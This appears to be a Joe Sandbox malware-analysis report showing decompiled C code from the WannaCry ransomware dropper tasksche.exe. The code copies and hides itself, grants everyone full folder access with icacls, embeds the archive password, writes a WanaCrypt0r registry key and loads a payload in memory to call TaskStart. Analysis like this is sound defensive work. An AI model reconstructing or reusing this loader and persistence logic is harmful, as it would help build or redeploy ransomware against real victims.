                                                                                0x00407473
                                                                                0x004073f9
                                                                                0x00407415
                                                                                0x00407415
                                                                                0x00407419
                                                                                0x00407454
                                                                                0x00000000
                                                                                0x00407454
                                                                                0x0040741b
                                                                                0x0040741d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040741f
                                                                                0x0040740b
                                                                                0x00407411
                                                                                0x00407413
                                                                                0x00407433
                                                                                0x00000000
                                                                                0x00407433
                                                                                0x00000000
                                                                                0x00407413
                                                                                0x00407421
                                                                                0x00000000
                                                                                0x00407421
                                                                                0x00000000
                                                                                0x00407339
                                                                                0x00407358
                                                                                0x0040735f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407361
                                                                                0x00407368
                                                                                0x004072e1
                                                                                0x004072e7
                                                                                0x004072fc
                                                                                0x0040730a
                                                                                0x0040730f
                                                                                0x00000000
                                                                                0x0040730f
                                                                                0x0040736e
                                                                                0x00407375
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407375
                                                                                0x004072da
                                                                                0x004072da
                                                                                0x004072da
                                                                                0x00000000
                                                                                0x004072da
                                                                                0x004072a1
                                                                                0x00000000
                                                                                0x004072a1
                                                                                0x00407263
                                                                                0x00407266
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040726c
                                                                                0x0040726f
                                                                                0x00407271
                                                                                0x00407273
                                                                                0x00407283
                                                                                0x00407283
                                                                                0x00407284
                                                                                0x00407290
                                                                                0x00407290
                                                                                0x00000000
                                                                                0x00407296
                                                                                0x00407275
                                                                                0x00407277
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407279
                                                                                0x0040727b
                                                                                0x00407288
                                                                                0x00407288
                                                                                0x00407288
                                                                                0x0040728e
                                                                                0x0040728f
                                                                                0x00000000
                                                                                0x0040728f
                                                                                0x0040727d
                                                                                0x00407281
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407281
                                                                                0x00407244
                                                                                0x0040723b
                                                                                0x00000000
                                                                                0x0040723b
                                                                                0x00407236
                                                                                0x00000000
                                                                                0x00407236
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                • API String ID: 0-1100577047
                                                                                • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                                                • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106stringfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}









                                                                                0x00402040
                                                                                0x00402054
                                                                                0x0040208e
                                                                                0x004020a3
                                                                                0x004020b1
                                                                                0x004020b3
                                                                                0x004020bb
                                                                                0x004020c3
                                                                                0x004020c8
                                                                                0x004020cf
                                                                                0x004020d0
                                                                                0x004020d5
                                                                                0x004020e1
                                                                                0x004020ed
                                                                                0x004020f5
                                                                                0x004020fa
                                                                                0x004020fc
                                                                                0x00402104
                                                                                0x00402119
                                                                                0x0040212a
                                                                                0x00402134
                                                                                0x0040214b
                                                                                0x00402151
                                                                                0x00402154
                                                                                0x00402158
                                                                                0x00402158
                                                                                0x00402154
                                                                                0x00402134
                                                                                0x00402160
                                                                                0x00402160
                                                                                0x00000000
                                                                                0x00402061
                                                                                0x00402061
                                                                                0x0040206f
                                                                                0x0040207f
                                                                                0x00000000
                                                                                0x00402165
                                                                                0x00402165
                                                                                0x0040216b
                                                                                0x0040216b
                                                                                0x0040207f

                                                                                APIs
                                                                                • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                                                • strcmp.MSVCRT(?), ref: 0040204B
                                                                                • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                                                • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                                                  • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                                                • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                                                • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                                                  • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                  • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                  • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                  • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                                                • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                                                • API String ID: 1074704982-2844324180
                                                                                • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                                                • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100registrystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}
















                                                                                0x0040110f
                                                                                0x00401116
                                                                                0x00401118
                                                                                0x0040111c
                                                                                0x00401129
                                                                                0x0040113a
                                                                                0x0040113c
                                                                                0x0040113e
                                                                                0x0040114b
                                                                                0x00401151
                                                                                0x00401157
                                                                                0x0040115c
                                                                                0x00401164
                                                                                0x0040116b
                                                                                0x0040116c
                                                                                0x00401175
                                                                                0x0040116e
                                                                                0x0040116e
                                                                                0x0040116e
                                                                                0x0040117a
                                                                                0x00401183
                                                                                0x0040118c
                                                                                0x004011cf
                                                                                0x004011e4
                                                                                0x004011ee
                                                                                0x004011f0
                                                                                0x004011f1
                                                                                0x004011fa
                                                                                0x004011fa
                                                                                0x0040118e
                                                                                0x0040119a
                                                                                0x004011bd
                                                                                0x004011c7
                                                                                0x004011c9
                                                                                0x004011c9
                                                                                0x00401203
                                                                                0x0040120b
                                                                                0x00401222
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040120b
                                                                                0x0040120d
                                                                                0x0040120d
                                                                                0x00401210
                                                                                0x00000000

                                                                                APIs
                                                                                • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                                                • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                                                • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                                                • strlen.MSVCRT(?), ref: 004011A7
                                                                                • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                                                • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                                                • String ID: 0@$Software\$WanaCrypt0r
                                                                                • API String ID: 865909632-3421300005
                                                                                • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                                                • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}
















                                                                                0x00401b68
                                                                                0x00401b80
                                                                                0x00401b87
                                                                                0x00401b89
                                                                                0x00401b95
                                                                                0x00401b9c
                                                                                0x00401b9e
                                                                                0x00401ba0
                                                                                0x00401bab
                                                                                0x00401bb4
                                                                                0x00401bb6
                                                                                0x00401bca
                                                                                0x00401bdd
                                                                                0x00401be9
                                                                                0x00401c04
                                                                                0x00401c06
                                                                                0x00401c19
                                                                                0x00401c40
                                                                                0x00401c53
                                                                                0x00401c70
                                                                                0x00401c38
                                                                                0x00401c3a
                                                                                0x00000000
                                                                                0x00401c8f
                                                                                0x00401c97
                                                                                0x00401cb2
                                                                                0x00401cbf
                                                                                0x00401cc4
                                                                                0x00401cd6
                                                                                0x00401ce0
                                                                                0x00000000
                                                                                0x00401ce2
                                                                                0x00401c70
                                                                                0x00401c2c
                                                                                0x00401c31
                                                                                0x00401c36
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                                                • String ID: %s\Intel$%s\ProgramData
                                                                                • API String ID: 3806094219-198707228
                                                                                • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                                                • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}






























                                                                                0x004021ef
                                                                                0x004021f8
                                                                                0x00402204
                                                                                0x0040243d
                                                                                0x00000000
                                                                                0x0040243d
                                                                                0x0040220a
                                                                                0x00402212
                                                                                0x00402239
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402242
                                                                                0x0040224a
                                                                                0x00000000
                                                                                0x00402254
                                                                                0x00402254
                                                                                0x00402254
                                                                                0x0040225a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040225c
                                                                                0x00402260
                                                                                0x00402260
                                                                                0x00402266
                                                                                0x0040226a
                                                                                0x0040228c
                                                                                0x00402291
                                                                                0x00402299
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004022a7
                                                                                0x004022aa
                                                                                0x004022af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004022b9
                                                                                0x004022bb
                                                                                0x004022be
                                                                                0x004022c1
                                                                                0x004022c8
                                                                                0x004022cb
                                                                                0x004022d1
                                                                                0x004022d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004022e8
                                                                                0x004022eb
                                                                                0x004022ee
                                                                                0x004022f0
                                                                                0x004022f5
                                                                                0x0040230f
                                                                                0x0040231a
                                                                                0x00402320
                                                                                0x00402324
                                                                                0x0040233d
                                                                                0x00402340
                                                                                0x0040234a
                                                                                0x00402350
                                                                                0x00402356
                                                                                0x0040235c
                                                                                0x00402362
                                                                                0x00402368
                                                                                0x0040236e
                                                                                0x00402374
                                                                                0x00402377
                                                                                0x00402386
                                                                                0x00402436
                                                                                0x00402437
                                                                                0x00000000
                                                                                0x0040243c
                                                                                0x00402396
                                                                                0x0040239a
                                                                                0x0040239d
                                                                                0x004023a0
                                                                                0x004023a7
                                                                                0x004023ba
                                                                                0x004023bc
                                                                                0x004023bf
                                                                                0x004023cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004023d3
                                                                                0x004023d3
                                                                                0x004023d6
                                                                                0x004023eb
                                                                                0x004023ec
                                                                                0x004023d8
                                                                                0x004023e0
                                                                                0x004023e6
                                                                                0x004023e6
                                                                                0x004023f8
                                                                                0x00402414
                                                                                0x00402419
                                                                                0x0040244d
                                                                                0x00402450
                                                                                0x00000000
                                                                                0x00402450
                                                                                0x0040241e
                                                                                0x00402448
                                                                                0x00000000
                                                                                0x00402448
                                                                                0x00402420
                                                                                0x00402421
                                                                                0x00402424
                                                                                0x00402429
                                                                                0x00402441
                                                                                0x00000000
                                                                                0x00402441
                                                                                0x00402430
                                                                                0x00402430
                                                                                0x00000000
                                                                                0x004023f8
                                                                                0x00402330
                                                                                0x00402336
                                                                                0x00402219
                                                                                0x00402219
                                                                                0x00000000
                                                                                0x00402219
                                                                                0x00402306
                                                                                0x00402308
                                                                                0x0040230d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040230d
                                                                                0x0040226c
                                                                                0x0040226f
                                                                                0x0040226f
                                                                                0x00402272
                                                                                0x00402276
                                                                                0x0040227c
                                                                                0x00402278
                                                                                0x00402278
                                                                                0x00402278
                                                                                0x00402281
                                                                                0x00402283
                                                                                0x00402283
                                                                                0x00402286
                                                                                0x00402289
                                                                                0x00402289
                                                                                0x00000000
                                                                                0x0040226f
                                                                                0x0040224a
                                                                                0x00402214
                                                                                0x00402219
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                                                • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                                                • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                                                • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                                                  • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                                                • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
